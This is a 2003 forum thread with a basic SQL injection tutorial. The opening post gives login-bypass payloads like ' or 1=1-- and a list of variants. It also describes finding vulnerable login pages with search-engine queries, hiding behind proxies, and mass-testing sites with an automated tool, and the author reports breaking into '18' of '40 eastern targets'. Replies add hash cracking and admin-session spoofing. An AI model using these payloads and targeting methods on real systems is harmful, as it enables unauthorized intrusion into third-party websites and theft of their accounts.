Government Security
Network Security Resources

Jump to content


Sql Injection (basic)

- - - - - security exploit proxy sql injection proxy list sql tutorial
  • Please log in to reply
8 replies to this topic

#1 Kenny


    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 05 June 2003 - 05:33 AM

SQL injection ()

a basic Login SQL injection tutorial

by ComSec aka ZSL

5 june 2003

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.

this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works



with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question


first let me go into details on how i go about my research

i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder


this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--


user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets


i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection

now the only trudge part is finding targets to i tend to search say google for login.asp or whatever

index of:/admin/login.asp

like this: index of login.asp

result: Search

17,000 possible targets trying various searches spews out plent more

now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

and so a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level ISP.. well enough atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits when it finds a target it will spew all the strings on that site as have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process



' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting

ComSec aka ZSL


WARNING: the information provided is for educationally purposes only and not to be used for malicious use. i hold no responsibility
for your the right thing and let admins know ay


Kenny aka ComSec

Please read the Forum Rules !!!


#2 ShadowRun



  • Sergeant Major
  • 170 posts

Posted 18 December 2003 - 05:49 AM

nice tutorial
i'm making my own research on sql injection methods
and searching forum and found this nice tutorial
i have one suggestion
to make your life easier create combo in raptor(all combinations u:p)
and use form@ or AD to check all possibilities automaticly
all u will have to do is type url's in proggie and press button ;)

#3 Barvaz88


    Private First Class

  • Members
  • 81 posts

Posted 18 December 2003 - 06:12 AM

tnx here is the your tutorial I found in Russian lol

#4 woutiir



  • Sergeant Major
  • 161 posts

Posted 18 December 2003 - 06:49 AM


Great tutorial, well written and pretty much to the point for the average public of this site.
Tho you name the word 'Ares' which is a program. Tho u don't give a link to it or some refference, it might be easier for us to know that. Since Ares is also a known Gnutela client :)

Once again, many thanks for putting so much efor in to making such nice tutorials over and over again. Keep 'm coming!

Gr. woutiir

#5 Guest_Smiler_*

  • Guests

Posted 18 December 2003 - 06:30 PM

fine tutorial!

it helps me to understand sql injection a little bit more!

i am on my to learn.. and learn and learn.. puhhh

thx a lot

#6 trunks


    Private First Class

  • Members
  • 28 posts

Posted 10 February 2004 - 04:20 PM

i tried this on my own site however i was just wondering how u actually decoded the password?
i tried with jtr but it gave no results

when i put ' in login / admin i got this msg

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '3590cb8af0bbb9e78c343b52b93773c9'' at line 6

when i just put ' as login i get following msg

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'd41d8cd98f00b204e9800998ecf8427e'' at line 6

how can password be decoded from this info?

#7 Kenny


    Former Commander In Chief

  • Retired Admin
  • 6,747 posts

Posted 10 February 2004 - 04:47 PM

this has nothing to do with the injection paper unless you got that message displayed after entering a string into the U/P boxes

there are several programs to crack these hashes like you said JTR , Cain & Abel , md5 crack and so on

also depends if you have the right unique hash for the admin access....if so you could then spoof the access via POST data and bypass the the login.. posing as Admin

i did a paper called XMB forum analysis posted here... with a prime example of spoofing

if it helps

oh and for new guys...there is also a Basic JTR tutorial with images i posted here , just search if your interested
Kenny aka ComSec

Please read the Forum Rules !!!


#8 technoboy



  • Members
  • 120 posts

Posted 10 February 2004 - 05:25 PM

I would also recommand the sql injection walthrough on securiteam:


and this one from spidynamics:


and this one also by spidynamic on 'blind' sql injection:


Happy injection :)

#9 technoboy



  • Members
  • 120 posts

Posted 10 February 2004 - 05:28 PM

but hey i alsmost forgot,

nice tutorial man :)

Also tagged with one or more of these keywords: security, exploit, proxy, sql injection, proxy list, sql, tutorial